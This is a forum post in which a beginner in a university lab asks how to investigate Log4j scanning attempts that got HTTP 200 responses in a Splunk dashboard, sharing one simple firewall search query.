Hello,
During that crazy 4logj times I would like ask you for advise. I am new in Splunk/security but I manage to create dashboard for 4logj attemps.
I can see some 4logj scanning activity and codes are 404,400 etc = I am not really worry about.
But sometimes I have code 200 as I can see this mean:
The HTTP 200 OK success status response code indicates that the request has succeeded. The meaning of a success depends on the HTTP request method: ... GET : The resource has been fetched and is transmitted in the message body.
i added screenshot.
I am wondering how to investigate it? Should i check for outband traffic?
what is the best query? as far i have just one
index=firewall 170.210.45.163 AND 31.131.16.127 ?
this is my Uni Lab environment so i just want to develop myself and learn , what you would do if you see such a string? many thanks